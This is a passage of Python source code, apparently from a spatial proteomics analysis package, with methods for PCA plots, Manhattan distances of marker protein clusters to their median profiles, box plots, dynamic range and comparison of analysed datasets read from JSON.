df_pca_all_marker_cluster_maps = df_pca_all_marker_cluster_maps.stack("Map")
self.df_pca_all_marker_cluster_maps = df_pca_all_marker_cluster_maps.sort_index(level=["Gene names", "Compartment"])
def plot_global_pca(self, map_of_interest="Map1", cluster_of_interest="Proteasome", x_PCA="PC1", y_PCA="PC3", collapse_maps=False):
""""
PCA plot will be generated
Args:
self:
df_organellarMarkerSet: df, columns: "Gene names", "Compartment", no index
df_pca: PCA processed dataframe, containing the columns "PC1", "PC2", "PC3",
index: "Gene names", "Protein IDs", "C-Score", "Q-value", "Map", "Compartment",
Returns:
pca_figure: global PCA plot
"""
if collapse_maps == False:
df_global_pca = self.df_pca.unstack("Map").swaplevel(0,1, axis=1)[map_of_interest].reset_index()
else:
df_global_pca = self.df_pca_combined.reset_index()
for i in self.markerproteins[cluster_of_interest]:
df_global_pca.loc[df_global_pca["Gene names"] == i, "Compartment"] = "Selection"
compartments = self.df_organellarMarkerSet["Compartment"].unique()
compartment_color = dict(zip(compartments, self.css_color))
compartment_color["Selection"] = "black"
compartment_color["undefined"] = "lightgrey"
fig_global_pca = px.scatter(data_frame=df_global_pca,
x=x_PCA,
y=y_PCA,
color="Compartment",
color_discrete_map=compartment_color,
title= "Protein subcellular localization by PCA for {}".format(map_of_interest)
if collapse_maps == False else "Protein subcellular localization by PCA of combined maps",
hover_data=["Protein IDs", "Gene names", "Compartment"],
template="simple_white",
opacity=0.9
)
return fig_global_pca
def plot_cluster_pca(self, cluster_of_interest="Proteasome"):
"""
PCA plot will be generated
Args:
self:
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], ...}
df_pca_all_marker_cluster_maps: PCA processed dataframe, containing the columns "PC1", "PC2", "PC3", filtered for marker genes, that are
consistent throughout all maps / coverage filtering.
Returns:
pca_figure: PCA plot, for one protein cluster all maps are plotted
"""
df_pca_all_marker_cluster_maps = self.df_pca_all_marker_cluster_maps
map_names = self.map_names
markerproteins = self.markerproteins
try:
for maps in map_names:
df_setofproteins_PCA = pd.DataFrame()
for marker in markerproteins[cluster_of_interest]:
try:
plot_try_pca = df_pca_all_marker_cluster_maps.xs((marker, maps), level=["Gene names", "Map"],
drop_level=False)
except KeyError:
continue
df_setofproteins_PCA = df_setofproteins_PCA.append(plot_try_pca)
df_setofproteins_PCA.reset_index(inplace=True)
if maps == map_names[0]:
pca_figure = go.Figure(
data=[go.Scatter3d(x=df_setofproteins_PCA.PC1,
y=df_setofproteins_PCA.PC2,
z=df_setofproteins_PCA.PC3,
hovertext=df_setofproteins_PCA["Gene names"],
mode="markers",
name=maps
)])
else:
pca_figure.add_trace(go.Scatter3d(x=df_setofproteins_PCA.PC1,
y=df_setofproteins_PCA.PC2,
z=df_setofproteins_PCA.PC3,
hovertext=df_setofproteins_PCA["Gene names"],
mode="markers",
name=maps
))
pca_figure.update_layout(autosize=False, width=500, height=500,
title="PCA plot for <br>the protein cluster: {}".format(cluster_of_interest),
template="simple_white")
return pca_figure
except:
return "This protein cluster was not quantified"
def calc_biological_precision(self):
"""
This function calculates the biological precision of all quantified protein clusters. It provides access to the data slice for all marker proteins, the distance profiles and the aggregated distances. It repeatedly applies the methods get_marker_proteins_unfiltered and calc_cluster_distances.
TODO: integrate optional arguments for calc_cluster_distances: complex_profile, distance_measure.
TODO: replace compatibiliy attributes with function return values and adjust attribute usage in downstream plotting functions.
Args:
self attributes:
markerproteins: dict, contains marker protein assignments
df_01_stacked: df, contains 0-1 nromalized data, required for execution of get_marker_proteins_unfiltered
Returns:
df_alldistances_individual_mapfracunstacked: df, distance profiles, fully unstacked
df_alldistances_aggregated_mapunstacked: df, profile distances (manhattan distance by default), fully unstacked
df_allclusters_01_unfiltered_mapfracunstacked: df, collected marker protein data
self attributes:
df_distance_noindex: compatibility version of df_alldistances_aggregated_mapunstacked
df_allclusters_01_unfiltered_mapfracunstacked
df_allclusters_clusterdist_fracunstacked_unfiltered: compatibility version of df_allclusters_01_unfiltered_mapfracunstacked (only used by quantificaiton_overview)
df_allclusters_clusterdist_fracunstacked: compatibility version of df_alldistances_individual_mapfracunstacked
genenames_sortedout_list = list of gene names with incomplete coverage
analysis_summary_dict entries:
"Manhattan distances" = df_distance_noindex
"Distances to the median profile": df_allclusters_clusterdist_fracunstacked, sorted and melted
"""
df_alldistances_individual_mapfracunstacked = pd.DataFrame()
df_alldistances_aggregated_mapunstacked = pd.DataFrame()
df_allclusters_01_unfiltered_mapfracunstacked = pd.DataFrame()
for cluster in self.markerproteins.keys():
# collect data irrespective of coverage
df_cluster_unfiltered = self.get_marker_proteins_unfiltered(cluster)
df_allclusters_01_unfiltered_mapfracunstacked = df_allclusters_01_unfiltered_mapfracunstacked.append(df_cluster_unfiltered)
# filter for coverage and calculate distances
df_cluster = df_cluster_unfiltered.dropna()
if len(df_cluster) == 0:
continue
df_distances_aggregated, df_distances_individual = self.calc_cluster_distances(df_cluster)
df_alldistances_individual_mapfracunstacked = df_alldistances_individual_mapfracunstacked.append(df_distances_individual)
df_alldistances_aggregated_mapunstacked = df_alldistances_aggregated_mapunstacked.append(df_distances_aggregated)
if len(df_alldistances_individual_mapfracunstacked) == 0:
self.df_distance_noindex = pd.DataFrame(columns = ["Gene names", "Map", "Cluster", "distance"])
self.df_allclusters_01_unfiltered_mapfracunstacked = pd.DataFrame(columns = ["Gene names", "Map", "Cluster", "distance"])
self.df_allclusters_clusterdist_fracunstacked_unfiltered = pd.DataFrame(columns = ["Fraction"])
self.df_allclusters_clusterdist_fracunstacked = pd.DataFrame(columns = ["Fraction"])
self.genenames_sortedout_list = "No clusters found"
return pd.DataFrame(), pd.DataFrame(), pd.DataFrame()
else:
df_alldistances_aggregated_mapunstacked.columns.name = "Map"
## Get compatibility with plotting functions, by mimicking assignment of old functions:
# old output of distance_calculation
self.df_distance_noindex = df_alldistances_aggregated_mapunstacked.stack("Map").reset_index().rename({0: "distance"}, axis=1)
self.analysis_summary_dict["Manhattan distances"] = self.df_distance_noindex.to_json()
# old output of multiple_iterations
# self.df_allclusters_clusterdist_fracunstacked_unfiltered --> this won't exist anymore, replaced by:
self.df_allclusters_01_unfiltered_mapfracunstacked = df_allclusters_01_unfiltered_mapfracunstacked
# kept for testing of quantification table:
self.df_allclusters_clusterdist_fracunstacked_unfiltered = df_allclusters_01_unfiltered_mapfracunstacked.stack("Map")
# same as before, but now already abs
self.df_allclusters_clusterdist_fracunstacked = df_alldistances_individual_mapfracunstacked.stack("Map")
df_dist_to_median = self.df_allclusters_clusterdist_fracunstacked.stack("Fraction")
df_dist_to_median.name = "distance"
df_dist_to_median = df_dist_to_median.reindex(index=natsort.natsorted(df_dist_to_median.index))
self.analysis_summary_dict["Distances to the median profile"] = df_dist_to_median.reset_index().to_json()
self.genenames_sortedout_list = [el for el in df_allclusters_01_unfiltered_mapfracunstacked.index.get_level_values("Gene names")
if el not in df_alldistances_individual_mapfracunstacked.index.get_level_values("Gene names")]
return df_alldistances_individual_mapfracunstacked, df_alldistances_aggregated_mapunstacked, df_allclusters_01_unfiltered_mapfracunstacked
def get_marker_proteins_unfiltered(self, cluster):
"""
This funciton retrieves the 0-1 normalized data for any given protein cluster, unfiltered for coverage.
Args:
cluster: str, cluster name, should be one of self.markerproteins.keys()
self attributes:
df_01_stacked: df, contains the fully stacked 0-1 normalized data
markerproteins: dict, contains marker protein assignments
Returns:
df_cluster_unfiltered: df, unfiltered data for the selected cluster, maps and fractions are unstacked.
self attribtues:
None
"""
df_in = self.df_01_stacked["normalized profile"].unstack("Fraction")
markers = self.markerproteins[cluster]
# retrieve marker proteins
df_cluster_unfiltered = pd.DataFrame()
for marker in markers:
try:
df_p = df_in.xs(marker, level="Gene names", axis=0, drop_level=False)
except:
continue
df_cluster_unfiltered = df_cluster_unfiltered.append(df_p)
if len(df_cluster_unfiltered) == 0:
return df_cluster_unfiltered
# Unstack maps and add Cluster to index
df_cluster_unfiltered = df_cluster_unfiltered.unstack("Map")
df_cluster_unfiltered.set_index(pd.Index(np.repeat(cluster, len(df_cluster_unfiltered)), name="Cluster"), append=True, inplace=True)
return df_cluster_unfiltered
def calc_cluster_distances(self, df_cluster, complex_profile=np.median, distance_measure="manhattan"):
"""
Calculates the absolute differences in each fraction and the profile distances relative to the center of a cluster.
Per default this is the manhattan distance to the median profile.
Args:
df_cluster: df, 0-1 normalized profiles of cluster members, should already be filtered for full coverage and be in full wide format.
complex_profile: fun, function provided to apply for calculating the reference profile, default: np.median.
distance_measure: str, selected distance measure to calculate. Currently only 'manhattan' is supported, everything else raises a ValueError.
self attributes:
None
Returns:
df_distances_aggregated: df, proteins x maps, if stacked distance column is currently named 0 but contains manhattan distances.
df_distances_individual: df, same shape as df_cluster, but now with absolute differences to the reference.
self attribtues:
None
"""
df_distances_aggregated = pd.DataFrame()
ref_profile = pd.DataFrame(df_cluster.apply(complex_profile, axis=0, result_type="expand")).T
df_distances_individual = df_cluster.apply(lambda x: np.abs(x-ref_profile.iloc[0,:]), axis=1)
# loop over maps
maps = set(df_cluster.columns.get_level_values("Map"))
for m in maps:
if distance_measure == "manhattan":
d_m = pw.manhattan_distances(df_cluster.xs(m, level="Map", axis=1), ref_profile.xs(m, level="Map", axis=1))
else:
raise ValueError(distance_measure)
d_m = pd.DataFrame(d_m, columns=[m], index=df_cluster.index)
df_distances_aggregated = pd.concat([df_distances_aggregated, d_m], axis=1)
df_distances_aggregated.columns.set_names(names="Map", inplace=True)
return df_distances_aggregated, df_distances_individual
def profiles_plot(self, map_of_interest="Map1", cluster_of_interest="Proteasome"):
"""
The function allows the plotting of filtered and normalized spatial proteomic data using plotly.express.
The median profile is also calculated based on the overlapping proteins. Profiles of proteins that are not quantified in all maps are dashed.
Args:
map_of_interest: str, must be in self.map_names
cluster_of_interest: str, must be in self.markerproteins.keys()
self attribtues:
df_allclusters_01_unfiltered_mapfracunstacked: df, contains 0-1 normalized profiles for all markerproteins detected in any map
Returns:
abundance_profiles_and_median_figure: plotly line plot, displaying the relative abundance profiles.
"""
try:
df_setofproteins = self.df_allclusters_01_unfiltered_mapfracunstacked.xs(cluster_of_interest, level="Cluster", axis=0)
df_setofproteins_median = df_setofproteins.dropna().xs(map_of_interest, level="Map", axis=1).median(axis=0)
# fractions get sorted
df_setofproteins = df_setofproteins.xs(map_of_interest, level="Map", axis=1).stack("Fraction")
df_setofproteins = df_setofproteins.reindex(index=natsort.natsorted(df_setofproteins.index))
df_setofproteins.name = "normalized profile"
# make it available for plotting
df_setofproteins = df_setofproteins.reindex(index=natsort.natsorted(df_setofproteins.index))
df_setofproteins = df_setofproteins.reset_index()
abundance_profiles_figure = px.line(df_setofproteins,
x="Fraction",
y="normalized profile",
color="Gene names",
line_group="Sequence" if "Sequence" in df_setofproteins.columns else "Gene names",
template="simple_white",
title="Relative abundance profile for {} of <br>the protein cluster: {}".format(map_of_interest, cluster_of_interest)
)
df_setofproteins_median.name = "normalized profile"
#fractions get sorted
df_setofproteins_median = df_setofproteins_median.reindex(index=natsort.natsorted(df_setofproteins_median.index))
# make it available for plotting
df_setofproteins_median = df_setofproteins_median.reset_index()
df_setofproteins_median.insert(0, "Gene names", np.repeat("Median profile", len(df_setofproteins_median)))
abundance_profiles_and_median_figure = abundance_profiles_figure.add_scatter(x=df_setofproteins_median["Fraction"],
y=df_setofproteins_median["normalized profile"],
name="Median profile"
)
# dash lines for proteins that have insufficient coverage across maps
abundance_profiles_and_median_figure.for_each_trace(lambda x: x.update(line={"dash":"dash"}),
selector=lambda x: x.name in self.genenames_sortedout_list)
return abundance_profiles_and_median_figure
except:
return "This protein cluster was not quantified"
def quantification_overview(self, cluster_of_interest="Proteasome"):
"""
Args:
self.df_allclusters_clusterdist_fracunstacked_unfiltered
columns: 01K, 03K, 06K, 12K, 24K, 80K
index: Gene names, Protein IDs, C-Score, Q-value, Map, Compartment, Cluster
Returns:
df
"""
df_quantification_overview = self.df_allclusters_clusterdist_fracunstacked_unfiltered.xs(cluster_of_interest, level="Cluster", axis=0)\
[self.fractions[0]].unstack("Map")
if "Sequence" in df_quantification_overview.index.names:
df_quantification_overview = df_quantification_overview.droplevel([i for i in df_quantification_overview.index.names if not i in ["Sequence","Gene names"]])
else:
df_quantification_overview = df_quantification_overview.droplevel([i for i in df_quantification_overview.index.names if not i=="Gene names"])
df_quantification_overview = df_quantification_overview.notnull().replace({True: "x", False: "-"})
return df_quantification_overview
def distance_boxplot(self, cluster_of_interest="Proteasome"):
"""
A box plot for 1 desired cluster, and across all maps is generated displaying the distribution of the e.g.
Manhattan distance.
Args:
self:
df_distance_noindex: stored as attribute (self.df_distance_noindex),index is reset.
It contains the column name "distance", in which the e.g. Manhattan distances for each individual protein
of the specified clusters (see self.markerproteins) are stored
map_names: individual map names are stored as an index
Returns:
distance_boxplot_figure: boxplot. Along the x-axis the maps, along the y-axis the distances are shown
"""
map_names = self.map_names
df_distance_noindex = self.df_distance_noindex
# "Gene names", "Map", "Cluster" and transferred into the index
df_distance_map_cluster_gene_in_index = df_distance_noindex.set_index(["Gene names", "Map", "Cluster"])
if "Sequence" in df_distance_map_cluster_gene_in_index.columns:
df_distance_map_cluster_gene_in_index.set_index("Sequence", append=True, inplace=True)
df_cluster_xmaps_distance_with_index = pd.DataFrame()
try:
# for each individual map and a defined cluster data will be extracted from the dataframe
# "df_distance_map_cluster_gene_in_index" and appended to the new dataframe df_cluster_xmaps_distance_with_index
for maps in map_names:
plot_try = df_distance_map_cluster_gene_in_index.xs((cluster_of_interest, maps),
level=["Cluster", "Map"], drop_level=False)
df_cluster_xmaps_distance_with_index = df_cluster_xmaps_distance_with_index.append(plot_try)
df_cluster_xmaps_distance_with_index["Combined Maps"] = "Combined Maps"
#number of proteins within one cluster
self.proteins_quantified_across_all_maps = df_cluster_xmaps_distance_with_index.unstack("Map").shape[0]
# index will be reset, required by px.box
df_cluster_xmaps_distance = df_cluster_xmaps_distance_with_index.reset_index()
distance_boxplot_figure = go.Figure()
distance_boxplot_figure.add_trace(go.Box(
x=df_cluster_xmaps_distance["Map"],
y=df_cluster_xmaps_distance["distance"],
boxpoints="all",
whiskerwidth=0.2,
marker_size=2,
hovertext=df_cluster_xmaps_distance["Gene names"]
))
distance_boxplot_figure.add_trace(go.Box(
x=df_cluster_xmaps_distance["Combined Maps"],
y=df_cluster_xmaps_distance["distance"],
boxpoints="all",
whiskerwidth=0.2,
marker_size=2,
hovertext=df_cluster_xmaps_distance["Gene names"]
))
distance_boxplot_figure.update_layout(
title="Manhattan distance distribution for <br>the protein cluster: {}".format(cluster_of_interest),
autosize=False,
showlegend=False,
width=500,
height=500,
# black box around the graph
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
title="Map",
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
title="distance",
mirror=True),
template="simple_white"
)
return distance_boxplot_figure
except:
self.cache_cluster_quantified = False
def distance_to_median_boxplot(self, cluster_of_interest="Proteasome"):
"""
A box plot for 1 desired cluster, across all maps and fractions is generated displaying the
distribution of the distance to the median. For each fraction, one box plot will be displayed.
Args:
self:
df_allclusters_clusterdist_fracunstacked, dataframe with single level column, stored as attribute
(self.allclusters_clusterdist_fracunstacked), in which "Fraction" is unstacked. It contains only the
normalized data of individual protein clusters substracted by the median of the respective protein cluster
for each fraction.
map_names: individual map names are stored as an index
Returns:
distance_to_median_boxplot_figure: Box plot. Along the x-axis, the maps are shown, along the y-axis
the distances is plotted
"""
df_boxplot_manymaps = pd.DataFrame()
try:
# for each individual map and a defined cluster data will be extracted from the dataframe
# "df_allclusters_clusterdist_fracunstacked" and appended to the new dataframe df_boxplot_manymaps
for maps in self.map_names:
plot_try = self.df_allclusters_clusterdist_fracunstacked.xs((cluster_of_interest, maps), level=["Cluster", "Map"], drop_level=False)
df_boxplot_manymaps = df_boxplot_manymaps.append(plot_try)
self.df_boxplot_manymaps = df_boxplot_manymaps
# index will be reset, required by px.violin
df_boxplot_manymaps = abs(df_boxplot_manymaps.stack("Fraction"))
df_boxplot_manymaps.name = "distance"
df_boxplot_manymaps = df_boxplot_manymaps.reindex(index=natsort.natsorted(df_boxplot_manymaps.index))
df_boxplot_manymaps = df_boxplot_manymaps.reset_index()
# box plot will be generated, every fraction will be displayed in a single plot
distance_to_median_boxplot_figure = px.box(df_boxplot_manymaps,
x="Map",
y="distance",
facet_col="Fraction",
facet_col_wrap=2,
boxmode="overlay", height=900, width=700, points="all",
hover_name="Gene names",
template="simple_white",
title="Distribution of the distance to the median for <br>the protein cluster: {}".format(cluster_of_interest))
return distance_to_median_boxplot_figure
except:
return "This protein cluster was not quantified"
def dynamic_range(self):
"""
Dynamic range of each individual protein clusters (of the median profile) across all maps is calculated"
Args:
self:
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], ...}
df_01_stacked: "MAP" and "Fraction" are stacked; the data in the column "normalized profile" is used for plotting. Additionally the columns
"MS/MS count" and "Ratio H/L count | Ratio H/L variability [%] | Ratio H/L" are found in LFQ and SILAC data respectively
Returns:
fig_dynamicRange: Bar plot, displaying the dynamic range for each protein cluster
self.df_dynamicRange: df, no index, columns: "Max", "Min", "Dynamic Range", "Cluster"
"""
df_setofproteins_allMaps = pd.DataFrame()
df_dynamicRange = pd.DataFrame()
df_01_stacked = self.df_01_stacked
for clusters in self.markerproteins:
try:
df_setofproteins_allMaps = pd.DataFrame()
for marker in self.markerproteins[clusters]:
try:
df_marker_allMaps = df_01_stacked.xs(marker, level="Gene names", drop_level=False)
except KeyError:
continue
df_setofproteins_allMaps = df_setofproteins_allMaps.append(df_marker_allMaps)
df_setofproteins_allMaps_median = df_setofproteins_allMaps["normalized profile"].unstack("Fraction").median()
df_dynamicRange = df_dynamicRange.append(pd.DataFrame(np.array([[max(df_setofproteins_allMaps_median),
min(df_setofproteins_allMaps_median),
max(df_setofproteins_allMaps_median)-min(df_setofproteins_allMaps_median),
clusters]]),
columns=["Max", "Min", "Dynamic Range", "Cluster"]),
ignore_index=True)
except:
continue
self.analysis_summary_dict["Dynamic Range"] = df_dynamicRange.to_json()
def plot_dynamic_range(self):
"""
Dynamic range of each individual protein clusters (of the median profile) across all maps is displayed"
Args:
self:
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], ...}
df_01_stacked: "MAP" and "Fraction" are stacked; the data in the column "normalized profile" is used for plotting. Additionally the columns
"MS/MS count" and "Ratio H/L count | Ratio H/L variability [%] | Ratio H/L" are found in LFQ and SILAC data respectively
Returns:
fig_dynamicRange: Bar plot, displaying the dynamic range for each protein cluster
self.df_dynamicRange: df, no index, columns: "Max", "Min", "Dynamic Range", "Cluster"
"""
fig_dynamicRange = px.bar(pd.read_json(self.analysis_summary_dict["Dynamic Range"]),
x="Cluster",
y="Dynamic Range",
base="Min",
template="simple_white",
width=1000,
height=500).update_xaxes(categoryorder="total ascending")
return fig_dynamicRange
def results_overview_table(self):
"""
Dataframe will be created, that provides information about "range", "mean" and "standardeviation",
given as the column names, based on the data given in df_distance_noindex
Args:
self:
df_distance_noindex: stored as attribute (self.df_distance_noindex),index is reset. It contains the column name "distance",
in which the e.g. Manhattan distances for each individual protein of the specified clusters (see self.markerproteins)
are stored
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], ...}
"""
df_distance_noindex = self.df_distance_noindex
df_distance_map_cluster_gene_in_index = df_distance_noindex.set_index(["Gene names", "Map", "Cluster"])
map_names = self.map_names
df_overview = pd.DataFrame()
for clusters in self.markerproteins:
#if a certain cluster is not available in the dataset at all
try:
for maps in map_names:
df_dist_map_cluster = df_distance_map_cluster_gene_in_index.xs((clusters, maps), level=["Cluster", "Map"], drop_level=False)
statistic_table = {"range": (df_dist_map_cluster["distance"].max(axis=0)) - (df_dist_map_cluster["distance"].min(axis=0)),
"median": df_dist_map_cluster["distance"].median(axis=0),
"standardeviation": df_dist_map_cluster["distance"].std(axis=0),
"Cluster": clusters,
"Map": maps
}
statistic_series = pd.Series(data=statistic_table)
df_statistic_table_individual_cluster = pd.DataFrame(statistic_series).T
df_overview = df_overview.append(df_statistic_table_individual_cluster)
df_dist_cluster = df_distance_map_cluster_gene_in_index.xs(clusters, level="Cluster")
statistic_table_combined = {
"range": (df_dist_cluster["distance"].max(axis=0)) - (df_dist_cluster["distance"].min(axis=0)),
"median": df_dist_cluster["distance"].median(axis=0),
"standardeviation": df_dist_cluster["distance"].std(axis=0),
"Cluster": clusters,
"Map": "combined maps"
}
statistic_series_combined = pd.Series(data=statistic_table_combined)
df_statistic_table_individual_cluster = pd.DataFrame(statistic_series_combined).T
df_overview = df_overview.append(df_statistic_table_individual_cluster)
except:
continue
try:
df_overview.set_index(["Cluster", "Map"], inplace=True)
df_overview.sort_index(axis=0, level=0, inplace=True)
except:
df_overview = pd.DataFrame()
self.analysis_summary_dict["Overview table"] = df_overview.reset_index().to_json()
self.analysed_datasets_dict[self.expname] = self.analysis_summary_dict.copy()
#self.analysis_summary_dict.clear()
return df_overview
def reframe_df_01ORlog_for_Perseus(self, df_01ORlog):
""""
To be available for Perseus df_01_stacked needs to be reframed.
Args:
df_01ORlog:
df_distance_noindex: stored as attribute (self.df_distance_noindex),index is reset.
It contains the column name "distance", in which the e.g. Manhattan distances for each individual protein
of the specified clusters (see self.markerproteins) are stored
map_names: individual map names are stored as an index
Returns:
df_01ORlog_svm:
LFQ:
columns: "MS/MS count_Map1_01K", "normalized profile_Map1_01K"
index: "Gene names", "Protein IDs", "C-Score", "Q-value", "Compartment"
SILAC:
columns: e.g. "Ratio H/L count_MAP2_80K", "Ratio H/L variability [%]_MAP1_03K", "normalized profile_MAP5_03K"
index: "Q-value", "Score", "Protein IDs", "Majority protein IDs", "Protein names", "Gene names", "id", "Compartment"
"""
df_01ORlog_svm = df_01ORlog.copy()
#df_01_filtered_combined = df_01_filtered_combined.stack(["Experiment", "Map"]).swaplevel(0,1, axis=0).dropna(axis=1)
index_ExpMap = df_01ORlog_svm.index.get_level_values("Map")+"_"+df_01ORlog_svm.index.get_level_values("Fraction")
index_ExpMap.name = "Map_Frac"
df_01ORlog_svm.set_index(index_ExpMap, append=True, inplace=True)
df_01ORlog_svm.index = df_01ORlog_svm.index.droplevel(["Map", "Fraction"])
df_01ORlog_svm = df_01ORlog_svm.unstack("Map_Frac")
#df_01ORlog_svm = df_01ORlog_svm.dropna(axis=0, subset=df_01ORlog_svm.loc[[], ["normalized profile"]].columns)
df_01ORlog_svm.columns = ["_".join(col) for col in df_01ORlog_svm.columns.values]
df_01ORlog_svm.rename(index={"undefined" : np.nan}, level="Compartment", inplace=True)
return df_01ORlog_svm
class SpatialDataSetComparison:
analysed_datasets_dict = SpatialDataSet.analysed_datasets_dict
css_color = SpatialDataSet.css_color
cache_stored_SVM = True
def __init__(self, ref_exp="Exp2", **kwargs): #clusters_for_ranking=["Proteasome", "Lysosome"]
#self.clusters_for_ranking = clusters_for_ranking
self.ref_exp = ref_exp
self.json_dict = {}
#self.fractions, self.map_names = [], [] #self.df_01_stacked, self.df_log_stacked = pd.DataFrame(), pd.DataFrame()
#collapse_maps,collapse_cluster, cluster_of_interest_comparison, multi_choice, multi_choice_venn, x_PCA_comp, y_PCA_comp
#if "organism" not in kwargs.keys():
# self.markerproteins = self.markerproteins_set["Human - Swissprot"]
#else:
# assert kwargs["organism"] in self.markerproteins_set.keys()
# self.markerproteins = self.markerproteins_set[kwargs["organism"]]
# del kwargs["organism"]
#self.unique_proteins_total = unique_proteins_total
self.exp_names, self.exp_map_names = [], []
self.df_01_filtered_combined, self.df_distance_comp = pd.DataFrame(), pd.DataFrame()
self.df_quantity_pr_pg_combined, self.df_dynamicRange_combined = pd.DataFrame(), pd.DataFrame()
def read_jsonFile(self): #, content=None
"""
Read-out of the JSON-file and currently analysed dataset, stored in "analysed_datasets_dict". It wil create df_distances_combined ("Gene
names", "Cluster" are stacked; "Map" and Experiment names (are not stored in an additional level name) are unstacked. Layout will be
adjusted for distance-plotting.
Args:
self.json_dict: contains the dictionary stored in AnalysedDatasets.json
{"Experiment name" : {
"changes in shape after filtering" : {
##SILAC##
"Original size" : tuple,
"Shape after categorical filtering" : tuple,
"Shape after Ratio H/L count (>= 3)/var (count>=2, var<30) filtering" : tuple,
"Shape after filtering for complete profiles" : tuple,
##LFQ/spectronaut##
"Original size" : tuple,
"Shape after MS/MS value filtering" : tuple,
"Shape after consecutive value filtering" : tuple,
},
"quantity: profiles/protein groups" : df - number of protein groups | number of profiles | data completeness of profiles
"Unique Proteins": list,
"Analysis parameters" : {
"acquisition" : str,
"filename" : str,
##SILAC##
"Ratio H/L count 1 (>= X)" : int,
"Ratio H/L count 2 (>=Y, var<Z)" : int,
"Ratio variability (<Z, count>=Y)" : int,
##LFQ/spectronaut##
"consecutive data points" : int,
"summed MS/MS counts" : int,
},
"0/1 normalized data - mean" : df - mean of all datapoints,
"0/1 normalized data" : df - individual cluster,
"Distances to the median profile" : df - individual cluster,
"Manhattan distances" : df - individual cluster,
"Dynamic Range": df - individual cluster,
"Overview table" : df - individual cluster,
##if user perform the Misclassification Analysis befor downloading the dictionary AnalysedDatasets.json##
{"Misclassification Analysis": {
"True: ER" : {
"Recall": int,
"FDR": int,
"Precision": int,
"F1": int
}
"True: NPC" : {...}
...
"Summary": {
"Total - Recall": int,
"Membrane - Recall" : int,
"Av per organelle - Recall": int,
"Median per organelle - Recall" : int,
"Av precision organelles" : int,
"Av F1 organelles" : int,
"Av F1 all clusters" : int,
}
}
}
}
Returns:
self:
df_01_filtered_combined: df, "Fraction" is unstacked; "Experiment", "Gene names", "Map", "Exp_Map" are stacked
df_distance_comp: df, no index, column names: "Gene names", "Cluster", "Protein IDs", "Compartment", "Experiment", "Map", "Exp_Map", "distance"
"distance": Manhattan distances for each individual protein of the specified clusters (see self.markerproteins) are stored
df_quantity_pr_pg_combined: df, no index, column names: "filtering", "type", "number of protein groups", "number of profiles",
"data completeness of profiles", "Experiment"
df_dynamicRange_combined: df, no index, column names: "Max", "Min", "Dynamic Range", "Cluster", "Experiment"
unique_proteins_total: dict, key: Experiment name, value: unique protein (groups)
exp_map_names: list of unique Exp_Map - fusions e.g. LFQ_Map1
exp_names: list of unique Experiment names - e.g. LFQ
"""
json_dict = self.json_dict
#add experiments that are not stored in AnalysedDAtasets.json for comparison
#try:
#if len(SpatialDataSet.analysed_datasets_dict.keys())>=1:
# json_dict.update(SpatialDataSet.analysed_datasets_dict)
##except:
#else:
# pass
self.analysis_parameters_total = {}
unique_proteins_total = {}
df_01_combined = pd.DataFrame()
for exp_name in json_dict.keys():
for data_type in json_dict[exp_name].keys():
if data_type == "0/1 normalized data":
df_01_toadd = pd.read_json(json_dict[exp_name][data_type])
df_01_toadd.set_index(["Gene names", "Protein IDs", "Compartment"], inplace=True)
if "Sequence" in df_01_toadd.columns:
df_01_toadd.set_index(["Sequence"], inplace=True, append=True)
df_01_toadd.drop([col for col in df_01_toadd.columns if not col.startswith("normalized profile")], inplace=True)
df_01_toadd.columns = pd.MultiIndex.from_tuples([el.split("?") for el in df_01_toadd.columns], names=["Set", "Map", "Fraction"])
df_01_toadd.rename(columns = {"normalized profile":exp_name}, inplace=True)
df_01_toadd.set_index(pd.Series(["?".join([str(i) for i in el]) for el in df_01_toadd.index.values], name="join"), append=True, inplace=True)
if len(df_01_combined) == 0:
df_01_combined = df_01_toadd.copy()
else:
df_01_combined = pd.concat([df_01_combined,df_01_toadd], sort=False, axis=1)
elif data_type == "quantity: profiles/protein groups" and exp_name == list(json_dict.keys())[0]:
df_quantity_pr_pg_combined = pd.read_json(json_dict[exp_name][data_type])
df_quantity_pr_pg_combined["Experiment"] = exp_name
elif data_type == "quantity: profiles/protein groups" and exp_name != list(json_dict.keys())[0]:
df_quantity_pr_pg_toadd = pd.read_json(json_dict[exp_name][data_type])
df_quantity_pr_pg_toadd["Experiment"] = exp_name
df_quantity_pr_pg_combined = pd.concat([df_quantity_pr_pg_combined, df_quantity_pr_pg_toadd])
elif data_type == "Manhattan distances" and exp_name == list(json_dict.keys())[0]:
df_distances_combined = pd.read_json(json_dict[exp_name][data_type])
df_distances_combined = df_distances_combined.set_index(["Map", "Gene names", "Cluster", "Protein IDs", "Compartment"]).copy()
if "Sequence" in df_distances_combined.columns:
df_distances_combined.set_index(["Sequence"], inplace=True, append=True)
df_distances_combined = df_distances_combined[["distance"]].unstack(["Map"])
df_distances_combined.rename(columns = {"distance":exp_name}, inplace=True)
elif data_type == "Manhattan distances" and exp_name != list(json_dict.keys())[0]:
df_distances_toadd = pd.read_json(json_dict[exp_name][data_type])
df_distances_toadd = df_distances_toadd.set_index(["Map", "Gene names", "Cluster", "Protein IDs", "Compartment"]).copy()
if "Sequence" in df_distances_toadd.columns:
df_distances_toadd.set_index(["Sequence"], inplace=True, append=True)
df_distances_toadd = df_distances_toadd[["distance"]].unstack(["Map"])
df_distances_toadd.rename(columns = {"distance":exp_name}, inplace=True)
df_distances_combined = pd.concat([df_distances_combined, df_distances_toadd], axis=1)#, join="inner")
elif data_type == "Dynamic Range" and exp_name == list(json_dict.keys())[0]:
df_dynamicRange_combined = pd.read_json(json_dict[exp_name][data_type])
df_dynamicRange_combined["Experiment"] = exp_name
elif data_type == "Dynamic Range" and exp_name != list(json_dict.keys())[0]:
df_dynamicRange_toadd = pd.read_json(json_dict[exp_name][data_type])
df_dynamicRange_toadd["Experiment"] = exp_name
df_dynamicRange_combined = pd.concat([df_dynamicRange_combined, df_dynamicRange_toadd])
# if data_type == "Overview table" and exp_name == list(json_dict.keys())[0]:
# #convert into dataframe
# df_distanceOverview_combined = pd.read_json(json_dict[exp_name][data_type])
